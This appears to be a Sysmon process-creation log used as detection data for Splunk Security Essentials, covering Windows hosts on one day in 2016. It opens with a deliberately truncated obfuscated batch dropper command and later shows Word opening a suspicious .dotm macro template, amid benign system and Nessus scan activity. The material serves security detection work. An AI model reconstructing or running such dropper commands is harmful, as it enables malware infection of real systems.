flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. cho %~i)>"!GSI!" && start "" "!GSI!"we8105desk
1822016-08-24T10:43:17.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1832016-08-24T10:43:17.000-0600wmiadap.exe /R /Twe8105desk
1842016-08-24T10:43:16.000-0600"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"we8105desk
1852016-08-24T10:43:12.000-0600"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "D:\Miranda_Tate_unveiled.dotm"we8105desk
1862016-08-24T10:43:12.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1872016-08-24T10:43:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1882016-08-24T10:43:03.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1892016-08-24T10:43:02.000-0600"C:\Windows\explorer.exe"we8105desk
1902016-08-24T10:42:16.000-0600C:\Windows\system32\AUDIODG.EXE 0x8b8we8105desk
1912016-08-24T10:36:59.000-0600"dwm.exe"we9041srv
1922016-08-24T10:36:59.000-0600"LogonUI.exe" /flags:0x0we9041srv
1932016-08-24T10:36:58.000-0600winlogon.exewe9041srv
1942016-08-24T10:36:58.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we9041srv
1952016-08-24T10:36:58.000-0600\SystemRoot\System32\smss.exe 00000000 00000050we9041srv
1962016-08-24T10:36:44.000-0600choice /T 1 /C X /D X /Nwe8105desk
1972016-08-24T10:36:44.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1982016-08-24T10:36:44.000-0600cmd /c C:\Windows\temp\nessus_W7GLH62C.batwe8105desk
1992016-08-24T10:36:26.000-0600"dwm.exe"we1149srv
2002016-08-24T10:36:25.000-0600"LogonUI.exe" /flags:0x0we1149srv
2012016-08-24T10:36:24.000-0600winlogon.exewe1149srv
2022016-08-24T10:36:24.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we1149srv
2032016-08-24T10:36:24.000-0600\SystemRoot\System32\smss.exe 00000000 00000050we1149srv
2042016-08-24T10:36:14.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2052016-08-24T10:36:14.000-0600C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exewe8105desk
2062016-08-24T10:36:14.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2072016-08-24T10:36:14.000-0600sc start tenable_mw_scan type=1 output=nessus_SFBBT7QA.txtwe8105desk
2082016-08-24T10:36:02.000-0600choice /T 1 /C X /D X /Nwe9041srv
2092016-08-24T10:36:02.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2102016-08-24T10:36:02.000-0600cmd /c C:\Windows\temp\nessus_ZCHPYH15.batwe9041srv
2112016-08-24T10:35:36.000-0600schtasks /query /XMLwe8105desk
2122016-08-24T10:35:36.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2132016-08-24T10:35:36.000-0600cmd /c "schtasks /query /XML > %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP & ren %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP nessus_VPG2T4UF.TXT"we8105desk
2142016-08-24T10:35:32.000-0600C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exewe9041srv
2152016-08-24T10:35:32.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2162016-08-24T10:35:32.000-0600sc start tenable_mw_scan type=1 output=nessus_QYVJLVDT.txtwe9041srv
2172016-08-24T10:35:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
2182016-08-24T10:35:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
2192016-08-24T10:35:08.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2202016-08-24T10:34:56.000-0600netsh advfirewall show allprofiles firewallpolicywe8105desk
2212016-08-24T10:34:56.000-0600cmd /c netsh advfirewall show allprofiles firewallpolicywe8105desk
2222016-08-24T10:34:55.000-0600netsh advfirewall firewall show rule name=all verbosewe8105desk
2232016-08-24T10:34:55.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2242016-08-24T10:34:55.000-0600cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & move %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP %SystemRoot%\TEMP\nessus_OCREA4YZ.TXTwe8105desk
2252016-08-24T10:34:50.000-0600schtasks /query /XMLwe9041srv
2262016-08-24T10:34:50.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2272016-08-24T10:34:50.000-0600cmd /c "schtasks /query /XML > %SystemRoot%\TEMP\nessus_W426FMMY.TMP & ren %SystemRoot%\TEMP\nessus_W426FMMY.TMP nessus_W426FMMY.TXT"we9041srv
2282016-08-24T10:34:21.000-0600tasklist /svcwe8105desk
2292016-08-24T10:34:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2302016-08-24T10:34:21.000-0600cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP & ren %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP nessus_task_listY42QJDIQ.TXT"we8105desk
2312016-08-24T10:34:19.000-0600C:\Windows\system32\svchost.exe -k wsappxwe9041srv
2322016-08-24T10:34:14.000-0600powershell "Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096"we9041srv
2332016-08-24T10:34:14.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2342016-08-24T10:34:14.000-0600cmd /c powershell "Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096" > %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP & move %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP %SystemRoot%\TEMP\nessus_R3OP3JQV.TXTwe9041srv
2352016-08-24T10:34:11.000-0600netsh advfirewall show allprofiles firewallpolicywe9041srv
2362016-08-24T10:34:11.000-0600cmd /c netsh advfirewall show allprofiles firewallpolicywe9041srv
2372016-08-24T10:34:11.000-0600netsh advfirewall firewall show rule name=all verbosewe9041srv
2382016-08-24T10:34:11.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2392016-08-24T10:34:11.000-0600cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & move %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP %SystemRoot%\TEMP\nessus_SV9VMSPT.TXTwe9041srv
2402016-08-24T10:34:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe8105desk
2412016-08-24T10:34:06.000-0600C:\Windows\system32\svchost.exe -k regsvcwe8105desk
2422016-08-24T10:34:05.000-0600netsh wlan show interfacewe8105desk
2432016-08-24T10:34:05.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2442016-08-24T10:34:05.000-0600cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP & move %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP %SystemRoot%\TEMP\nessus_IQK9FYH1.TXTwe8105desk
2452016-08-24T10:34:04.000-0600C:\Windows\servicing\TrustedInstaller.exewe8105desk
2462016-08-24T10:33:53.000-0600netstat -anowe8105desk
2472016-08-24T10:33:53.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2482016-08-24T10:33:53.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
2492016-08-24T10:33:53.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe7_ Global\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2502016-08-24T10:33:53.000-0600cmd /c "netstat -ano > %SystemRoot%\TEMP\nessus_4UC962OK.TMP & ren %SystemRoot%\TEMP\nessus_4UC962OK.TMP nessus_4UC962OK.TXT"we8105desk
2512016-08-24T10:33:52.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2522016-08-24T10:33:46.000-0600c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm45a13fae-8ca5-408b-a9e4-631fc0631086 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 -ta 0we1149srv
2532016-08-24T10:33:44.000-0600tasklist /svcwe9041srv
2542016-08-24T10:33:44.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2552016-08-24T10:33:44.000-0600cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP & ren %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP nessus_task_listI8RC8S8K.TXT"we9041srv
2562016-08-24T10:33:32.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2572016-08-24T10:33:30.000-0600netsh wlan show interfacewe9041srv
2582016-08-24T10:33:30.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2592016-08-24T10:33:30.000-0600cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_JMJL39S5.TMP & move %SystemRoot%\TEMP\nessus_JMJL39S5.TMP %SystemRoot%\TEMP\nessus_JMJL39S5.TXTwe9041srv
2602016-08-24T10:33:30.000-0600C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.16384_none_fa1dc1539b4180d8\TiWorker.exe -Embeddingwe9041srv
2612016-08-24T10:33:30.000-0600C:\Windows\servicing\TrustedInstaller.exewe9041srv
2622016-08-24T10:33:24.000-0600C:\Windows\system32\sppsvc.exewe9041srv
2632016-08-24T10:33:22.000-0600netstat -anowe9041srv
2642016-08-24T10:33:22.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe9041srv
2652016-08-24T10:33:22.000-0600cmd /c "netstat -ano > %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP & ren %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP nessus_4LX6EPAV.TXT"we9041srv
2662016-08-24T10:33:21.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe9041srv
2672016-08-24T10:26:02.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe9041srv
2682016-08-24T10:26:02.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe9041srv
2692016-08-24T10:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
2702016-08-24T10:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
2712016-08-24T10:21:04.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2722016-08-24T10:20:25.000-0600C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embeddingwe8105desk
2732016-08-24T10:19:43.000-0600C:\Windows\system32\wermgr.exe -queuereportingwe8105desk
2742016-08-24T10:18:10.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2752016-08-24T10:18:10.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2762016-08-24T10:15:15.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2772016-08-24T10:14:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2782016-08-24T10:12:40.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2792016-08-24T10:12:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2802016-08-24T10:10:24.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2812016-08-24T10:10:24.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2822016-08-24T10:10:00.000-0600wmiadap.exe /F /T /Rwe8105desk
2832016-08-24T10:09:04.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
2842016-08-24T10:08:57.000-0600taskhost.exe $(Arg0)we8105desk
2852016-08-24T10:08:57.000-0600C:\Windows\System32\sdclt.exe /CONFIGNOTIFICATIONwe8105desk
2862016-08-24T10:08:16.000-0600"C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe"we8105desk
2872016-08-24T10:08:16.000-0600C:\Windows\system32\sppsvc.exewe8105desk
2882016-08-24T10:08:16.000-0600"C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe"we8105desk
2892016-08-24T10:07:23.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
2902016-08-24T10:07:22.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
2912016-08-24T10:07:22.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
2922016-08-24T10:07:20.000-0600C:\Windows\system32\SearchIndexer.exe /Embeddingwe8105desk
2932016-08-24T10:06:49.000-0600C:\Windows\system32\SearchIndexer.exe /Embeddingwe8105desk
2942016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServiceswe8105desk
2952016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe"we8105desk
2962016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe"we8105desk
2972016-08-24T10:06:45.000-0600"C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"we8105desk
2982016-08-24T10:06:44.000-0600"C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe"we8105desk
2992016-08-24T10:06:44.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
3002016-08-24T10:06:44.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
3012016-08-24T10:06:44.000-0600C:\Windows\SysWOW64\runonce.exe /Run6432we8105desk
3022016-08-24T10:06:44.000-0600"C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe"we8105desk
3032016-08-24T10:06:44.000-0600"C:\Program Files\Boot Camp\Bootcamp.exe"we8105desk
3042016-08-24T10:06:44.000-0600"C:\Windows\System32\igfxpers.exe"we8105desk
3052016-08-24T10:06:44.000-0600"C:\Windows\System32\hkcmd.exe"we8105desk
3062016-08-24T10:06:44.000-0600"C:\Windows\system32\igfxsrvc.exe" -Embeddingwe8105desk
3072016-08-24T10:06:43.000-0600"C:\Windows\System32\igfxtray.exe"we8105desk
3082016-08-24T10:06:42.000-0600C:\Windows\Explorer.EXEwe8105desk
3092016-08-24T10:06:42.000-0600"C:\Windows\system32\Dwm.exe"we8105desk
3102016-08-24T10:06:42.000-0600C:\Windows\system32\userinit.exewe8105desk
3112016-08-24T10:06:42.000-0600"taskhost.exe"we8105desk
3122016-08-24T10:06:42.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
3132016-08-24T10:06:20.000-0600C:\Windows\System32\svchost.exe -k secsvcswe8105desk
3142016-08-24T10:06:16.000-0600taskhost.exe SYSTEMwe8105desk
3152016-08-24T10:06:15.000-0600"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-ac6024c6-0e8e-4905-9442-280600567282 -SystemEventPortName:HostProcess-47fb5318-ca0f-44a7-866d-cf286eabcb42 -IoCancelEventPortName:HostProcess-73811b94-bc88-4562-beac-f050c8c2e1ab -NonStateChangingEventPortName:HostProcess-487fce22-2fcf-4925-8557-9c32d3729e3e -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:9e02b3ab-0d2b-4e15-8682-744712c1ca2ewe8105desk
3162016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k bthsvcswe8105desk
3172016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonationwe8105desk
3182016-08-24T10:06:15.000-0600C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestrictedwe8105desk
3192016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"we8105desk
3202016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"we8105desk
3212016-08-24T10:06:08.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"we8105desk
3222016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"we8105desk
3232016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"we8105desk
3242016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"we8105desk
3252016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"we8105desk
3262016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"we8105desk
3272016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"we8105desk
3282016-08-24T10:06:07.000-0600cmd /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"we8105desk
3292016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1we8105desk
3302016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c btool server list general --no-logwe8105desk
3312016-08-24T10:06:06.000-0600C:\Windows\system32\cmd.exe /c btool server list replication_port --no-logwe8105desk
3322016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\E5548D7D-7D5D-4693-A892-94129A925C26.vbswe8105desk
3332016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\A1985133-B0BB-4771-9B34-54C1DC493370.vbswe8105desk
3342016-08-24T10:06:03.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3352016-08-24T10:06:03.000-0600C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3362016-08-24T10:06:03.000-0600cscript.exe /nologo C:\Windows\TEMP\5F336C48-BD3F-46AF-8FB1-E076BA7329CB.vbswe8105desk
3372016-08-24T10:06:01.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1we8105desk
3382016-08-24T10:06:01.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe8105desk
3392016-08-24T10:06:01.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
3402016-08-24T10:06:01.000-0600C:\Windows\system32\cmd.exe /c btool server list kvstore --no-logwe8105desk
3412016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c btool server list general --no-logwe8105desk
3422016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c btool web list settings --no-logwe8105desk
3432016-08-24T10:06:00.000-0600C:\Windows\Sysmon.exewe8105desk
3442016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argswe8105desk
3452016-08-24T10:06:00.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
3462016-08-24T10:06:00.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
3472016-08-24T10:06:00.000-0600C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarswe8105desk
3482016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe"we8105desk
3492016-08-24T10:06:00.000-0600C:\Windows\system32\AppleTimeSrv.exewe8105desk
3502016-08-24T10:06:00.000-0600C:\Windows\system32\AppleOSSMgr.exewe8105desk
3512016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe"we8105desk
3522016-08-24T10:06:00.000-0600"C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe"we8105desk
3532016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkwe8105desk
3542016-08-24T10:06:00.000-0600C:\Windows\System32\spoolsv.exewe8105desk
3552016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k NetworkServicewe8105desk
3562016-08-24T10:06:00.000-0600"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-fa915abb-3e19-454d-abc3-af7084ddd6b2 -SystemEventPortName:HostProcess-ac8be148-87a6-4e0c-9c46-e06e1597f0ce -IoCancelEventPortName:HostProcess-c6ad7e19-54f2-46ea-af3f-88f7621e76ea -NonStateChangingEventPortName:HostProcess-b15c724e-59d6-4e9e-bba1-99864b9d80ce -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:584cb968-8b77-45ad-ae19-bbeb66853bc0we8105desk
3572016-08-24T10:06:00.000-0600"LogonUI.exe" /flags:0x0we8105desk
3582016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k LocalServicewe8105desk
3592016-08-24T10:06:00.000-0600winlogon.exewe8105desk
3602016-08-24T10:06:00.000-0600C:\Windows\system32\AUDIODG.EXE 0x2c8we8105desk
3612016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k netsvcswe8105desk
3622016-08-24T10:06:00.000-0600C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestrictedwe8105desk
3632016-08-24T10:06:00.000-0600C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestrictedwe8105desk
3642016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k RPCSSwe8105desk
3652016-08-24T10:06:00.000-0600C:\Windows\system32\svchost.exe -k DcomLaunchwe8105desk
3662016-08-24T10:06:00.000-0600C:\Windows\system32\lsm.exewe8105desk
3672016-08-24T10:06:00.000-0600C:\Windows\system32\lsass.exewe8105desk
3682016-08-24T10:06:00.000-0600C:\Windows\system32\services.exewe8105desk
3692016-08-24T10:06:00.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we8105desk
3702016-08-24T10:06:00.000-0600wininit.exewe8105desk
3712016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exe 00000001 00000048we8105desk
3722016-08-24T10:06:00.000-0600%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16we8105desk
3732016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exe 00000000 00000048we8105desk
3742016-08-24T10:06:00.000-0600\??\C:\Windows\system32\autochk.exe *we8105desk
3752016-08-24T10:06:00.000-0600\SystemRoot\System32\smss.exewe8105desk
3762016-08-24T09:44:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
3772016-08-24T09:44:54.000-0600C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embeddingwe8105desk
3782016-08-24T09:44:51.000-0600C:\Windows\system32\vssvc.exewe8105desk
3792016-08-24T09:44:50.000-0600"C:\Program Files (x86)\Common Files\Acronis\VssRequestor64\vss_requestor.exe" -Embeddingwe8105desk
3802016-08-24T09:39:33.000-0600C:\Windows\system32\wermgr.exe -queuereportingwe8105desk